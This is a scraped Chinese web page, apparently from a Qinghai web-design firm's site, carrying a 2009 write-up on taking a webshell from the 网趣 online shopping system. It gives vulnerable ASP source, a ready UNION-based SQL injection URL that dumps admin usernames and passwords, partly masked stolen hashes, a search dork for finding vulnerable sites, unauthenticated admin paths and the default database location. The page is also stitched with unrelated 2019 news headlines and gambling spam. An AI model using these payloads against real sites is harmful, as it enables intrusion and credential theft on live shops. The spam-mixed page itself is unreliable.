• 网约车陷阱多 谨防四类风险 2019-07-14
  • 水土保持-近在你身边-图解新闻 2019-07-14
  • 一诚长老:出去走一走 才知道有没有定力 2019-07-09
  • 中方有力回击!美国多个行业喊痛:“加征关税就是对美国消费者征税” 2019-07-07
  • 【学习时刻】参会专家盛小云:坚定文化自信,用高尚的作品引领社会风尚 2019-07-07
  • 安徽省高校公共体艺教育推行俱乐部制 2019-06-23
  • “一带一路”中小企业国际合作高峰论坛在京举行 2019-06-23
  • 端午节期间 拉萨至日喀则增开列车 2019-06-16
  • 朱迪:社会发展新阶段的消费品味特征 2019-06-15
  • 淳安县:构建“大调解”体系 2019-06-15
  • 糖尿病打胰岛素是好还是坏?知道答案的糖友都沉默了 2019-06-08
  • 轩辕坛-聚焦汽车两会热点 2019-06-07
  • 波罗木刻:一把刻刀 点木成“金” 2019-06-06
  • 最高检依法决定对余刚立案侦查 2019-06-05
  • 联播快讯:长江镇江段今起实施12天限时封航 2019-06-05
  • 青海网站建设、网络推广最好的公司--您身边的网站建设专家,马上拿起电话,联系我们:0971-8235355   
    4场进球彩方法 4场进球彩方法 |  公司简介 |  网站建设 |  网络推广 |  空间租用 |  域名注册 |  企业邮局 |  网络安全 |  网站编程 |  客服中心 |  联系我们 |  人才招聘
     
    西宁威势最新网站制做案例展示
    Lastest Project
     
    西宁网站建设  
    当前位置为:4场进球彩方法 >> 脚本安全 >> 正文  
    [原创]网趣网上购物系统时尚版 V最新漏洞拿WEBSHELL

    文章来源: 4场进球彩方法     发布时间:2009-11-7    浏览次数:12259    tags:网趣 漏洞

    4场进球彩方法 www.iubwq.tw 网趣网上购物系统时尚版 V最新 

       今天周末,睡到中午才起床,刚上线,看到QQ好友辐射鱼给我留言,找我测试脚本漏洞。

    辐射鱼 13:01:03
    等我找个点. 
    辐射鱼 13:03:48
    //www.iubwq.tw/price.asp?anid=62%20and%20exists%20(select%20*%20from%20cnhww) 
    辐射鱼 13:04:41
     表cnhww.为啥不支持 order by 
    辐射鱼 13:05:06
    //www.iubwq.tw/price.asp?anid=62%20order%20by%201 
    辐射鱼 13:05:29
    password/admin 

        随后我手动测试了几下,发现漏洞确实存在,我跟他要了源码和数据库,看完以后理解起来就不是很难了,因为源码是这样写的:

    price.asp

    rs.open "select * from products where  anclassid="&anid&" order by adddate desc",conn,1,1

    自己构造语句:

    //www.iubwq.tw/price.asp?anid=62%20%20and%201=2%20union%20select%20admin,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,password,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50%20from%20cnhww

    之后成功暴出用户名和密码。

    商品序号 商品名称 会员价 当前库存 规格 规格参数
    weih**cheye 15 7a57a5a7438**aac 36 23 查看详细
    wei**cheye 15 b2ea44b2cf0**bdb 36 23 查看详细
    緯**業 15 88121ef9c5a**5f9 36 23 查看详细

       上面信息因为包含敏感信息,所以马赛克了一下,用*代替了部份,因为是帮忙测试,所以到此处后我就告一段落,之后辐射鱼又将此过程总结了一下,写了一篇文章,我直接贴上来,有兴趣的自己研究吧!

    网趣网上购物系统时尚版 V最新

    源码我大致看了下.前台一般不存在什么注入.数据库的默认后串为.asp,可以考虑在前台注册用户用户给数据库里面插马.

    我的思路:.

     

    1.       分析源码.

    2.       数据库中插马.

    3.       寻找上传之类的文件分析.

    4.       后台的利用分析.

     

    …………………………………………

     

    本地架设个iis.测试下看看.

     

     

    我们随便提交个id ‘看看存在不存在注入.

     

    提交ID=XXX‘返回主页.

     

    Products.asp

     

    <html>

    <head>

    <!--#include file="conn.asp"-->

    <!--#include file="config.asp"-->

    <!--#include file="./alipay_inc/myAlipay.asp"-->

    <!--#include file="./alipay_inc/alipay_Config.asp"-->

    <title><%=webname%>--商品详细信息</title>

    <meta http-equiv="Content-Type" content="text/html; charset=gb2312">

    <meta name="description" content="网趣网上购物系统,网趣网上购物系统时尚版,网趣购物系统,网上购物系统,购物系统,网趣购物,商城源码,网上商店,网上商店系统,域名注册,虚拟主机,恒伟网络">

    <meta name="keywords" content="网趣网上购物系统,网趣网上购物系统时尚版,网趣购物系统,网上购物系统,购物系统,网趣购物,商城源码,网上商店,网上商店系统,域名注册,虚拟主机,恒伟网络">

     

    <link href="images/css.css" rel="stylesheet" type="text/css">

    </head>

    <script language="JavaScript">

           <!--

           function OpenNews()

           {

                         window.name = "news"

                         win = window.open('','newswin','left=110,width=600,height=420,scrollbars=1');

           }

           //-->

           </script>

    <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" >

    <%if IsNumeric(request.QueryString("id"))=False then

    response.write("<script>alert(""非法访问!"");location.href=""index.asp"";</script>")

    response.end

    end if

    dim id

    id=request.QueryString("id")

    if not isinteger(id) then

    response.write"<script>alert(""非法访问!"");location.href=""index.asp"";</script>"

    end if%>

    <%dim bookid,action

    bookid=request.QueryString("id")

    action=request.QueryString("action")

    if action="save" then

    set rs=server.CreateObject("adodb.recordset")

    rs.open "select * from review",conn,1,3

    rs.addnew

    rs("bookid")=bookid

    rs("pingji")=request("pingji")

    rs("pinglunname")=HTMLEncode2(trim(request("pinglunname")))

    rs("pingluntitle")=HTMLEncode2(trim(request("pingluntitle")))

    rs("pingluncontent")=HTMLEncode2(trim(request("pingluncontent")))

    rs("ip")=Request.servervariables("REMOTE_ADDR")

    rs("pinglundate")=now()

    rs("shenhe")=0

    rs.update

    rs.close

    set rs=nothing

    set rs=server.CreateObject("adodb.recordset")

    rs.open "select * from products where bookid="&bookid,conn,1,3

    rs("pingji")=rs("pingji")+1

    rs("pingjizong")=rs("pingjizong")+request("pingji")

    rs.update

    rs.close

    set rs=nothing

    response.Write "<script language=javascript>alert('您的评论已成功提交,待管理员审核!');history.go(-1);</script>"

    response.End

    end if

    %>

    有防注入.

    都是session验证,没有cookie这条路子我也测试了.不行

     

    继续看代码.

     

    Price.asp

     

    <!--#include file="conn.asp"-->

    <!--#include file="config.asp"-->

    <html>

    <head>

     

    <title><%=webname%></title>

    <meta http-equiv="Content-Type" content="text/html; charset=gb2312">

    <meta name="description" content="<%=des%>">

    <meta name="keywords" content="<%=keya%>">

    …………省略

     

    nd if

    set rs=server.CreateObject("adodb.recordset")

    if anid<>"" then

    rs.open "select * from products where  anclassid="&anid&" order by adddate desc",conn,1,1

    else

    select case selectm

    case ""

    rs.open "select * from products order by adddate desc",conn,1,1

    case "0"

    rs.open "select * from products order by adddate desc",conn,1,1

    case "shopid"

     

     

    end select

    end if

    if err.number<>0 then

    response.write "暂无相关数据!"

    end if

    if rs.eof And rs.bof then

    Response.Write "<p align='center'>暂无相关数据!</p>"

    else

    totalPut=rs.recordcount

    if currentpage<1 then

    currentpage=1

    end if

    if (currentpage-1)*MaxPerPage>totalput then

    if (totalPut mod MaxPerPage)=0 then

    currentpage= totalPut \ MaxPerPage

    else

    currentpage= totalPut \ MaxPerPage + 1

    end if

    end if

    if currentPage=1 then

    showContent

    showpage totalput,MaxPerPage,"Price.asp"

    else

    if (currentPage-1)*MaxPerPage<totalPut then

    rs.move  (currentPage-1)*MaxPerPage

    dim shopmark

    shopmark=rs.bookmark

    showContent

    showpage totalput,MaxPerPage,"Price.asp"

    else

    currentPage=1

    showContent

    showpage totalput,MaxPerPage,"Price.asp"

    end if

    end if

    end if

    sub showContent

    dim i

    i=0

    %>

    没有防过滤.

    Price.asp?anid=62;(提交查询语句)--

    /price.asp?anid=62%20%20and%201=2%20union%20select%20admin,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,password,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50%20from%20cnhww

     

     

    /admin/admin.asp

    /admin/admin3.asp

     

    <html><head><title>商城管理系统</title>

    <meta http-equiv="Content-Type" content="text/html; charset=gb2312">

    <link href="../images/css.css" rel="stylesheet" type="text/css">

    </head>

    <body>

    <%

     

    Dim theInstalledObjects(24)

    没有验证可以直接访问.

     

     

     

    2.数据库.

     

    \cnhwwdata\cnhww.asp 默认的数据库路径.

     

    思路: 如果数据库路径没修改,可以考虑在前台注册用户拿shell.

     

     

     

    <%nodown%> 防下载表段.

     

    Cnhww 后台用户表段.

     

    User 前台用户表段.

     

    这里不用说了吧.防下载表段在插到数据库的第一个行.数据库插马这条路子就不走了.(前台插入一句话也不会闭合)

     

     

    1.       后台拿shell.

     

    没有防过滤.

    Price.asp?anid=62;(提交查询语句)--

     

     

    语句就不构造了.

    查询Cnhww 表里面的

    Admin /password

    后台拿shell的方法

     

    网趣网上购物系统时尚版

    关键字

    inurl:Price.asp?anid=

    利用方法

    /price.asp?anid=62%20%20and%201=2%20union%20select%20admin,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,password,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50%20from%20cnhww

    拿到官方网站去测试,结果发现用了通用防注入

    以下是引用片段:
    非法操作!系统做了如下记录↓
    操作IP:123.45.67.89

    操作时间:2009-11-7 15:31:35
    操作页面:/fshop/products.asp
    提交方式:GET
    提交参数:id
    提交数据:346 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 from cnhww order by adddate desc

    辐射鱼接着测试,发现,官方将后台删除了,并且数据库表名也改了,哈哈,我就不接着玩了。


    上一篇:[原创]HI在线客服的一个漏洞
    下一篇:本人N年前写的文章,注入影子鹰
    评论列表
    正在加载评论……
      
    评论   
    呢  称:
    验证码: 若看不清请点击更换!
    内  容:
     
     
      在线洽谈咨询:
    点击这里,在线洽谈   点击这里,在线洽谈   点击这里,在线洽谈
    与我交谈  与我交谈 与我交谈
    乘车路线    汇款方式   加盟合作  人才招聘  
    公司地址:青海省西宁市西关大街73号(三二四部队招行所四楼)     青ICP备13000578号-1 公安机关备案号:63010402000123    
    QQ:147399120    mail:[email protected]    电话: 13897410341    邮编:810000
    © Copyright( 2008-2009) www.iubwq.tw All Rights Reserved    版权所有:西宁威势电子信息服务有限公司 未经书面制授权,请勿随意转载!
    业务:青海网站制做、青海网站建设、青海网页设计、西宁网站制做、西宁网站建设、青海域名注册、青海网络推广、青海网站推广、青??占渥庥?/a>、4场进球彩方法、4场进球彩方法、网络安全

  • 网约车陷阱多 谨防四类风险 2019-07-14
  • 水土保持-近在你身边-图解新闻 2019-07-14
  • 一诚长老:出去走一走 才知道有没有定力 2019-07-09
  • 中方有力回击!美国多个行业喊痛:“加征关税就是对美国消费者征税” 2019-07-07
  • 【学习时刻】参会专家盛小云:坚定文化自信,用高尚的作品引领社会风尚 2019-07-07
  • 安徽省高校公共体艺教育推行俱乐部制 2019-06-23
  • “一带一路”中小企业国际合作高峰论坛在京举行 2019-06-23
  • 端午节期间 拉萨至日喀则增开列车 2019-06-16
  • 朱迪:社会发展新阶段的消费品味特征 2019-06-15
  • 淳安县:构建“大调解”体系 2019-06-15
  • 糖尿病打胰岛素是好还是坏?知道答案的糖友都沉默了 2019-06-08
  • 轩辕坛-聚焦汽车两会热点 2019-06-07
  • 波罗木刻:一把刻刀 点木成“金” 2019-06-06
  • 最高检依法决定对余刚立案侦查 2019-06-05
  • 联播快讯:长江镇江段今起实施12天限时封航 2019-06-05
  • 灌篮高手注册 香港六合彩白小姐 拜仁慕尼黑中文官网 好多寿司返水 捷报网球比分网 巴黎圣日耳曼新球衣号码 体彩河南快赢481走势图 网球场 劲爆体育篮球比分 快乐赛车开奖直播